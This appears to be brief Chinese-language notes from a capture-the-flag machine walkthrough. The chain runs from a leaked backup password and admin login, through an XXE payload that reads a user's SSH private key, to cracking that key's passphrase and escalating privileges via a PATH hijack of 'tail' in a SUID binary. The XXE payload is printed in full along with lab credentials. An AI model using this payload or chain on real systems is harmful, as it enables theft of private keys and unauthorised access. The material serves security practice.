扫描
custom下的有个bak
密码是bulldog19

另一个端口admin:bulldog19登录

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE comment [
  <!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa">
]>
<comment>
  <name>Joe Hamd</name>
  <author>Barry Clad</author>
  <com>&xxe;</com>
</comment>

其实一眼就看出来是xml了,没去试
爆破id_rsa
urieljames

环境变量劫持suid程序里的tail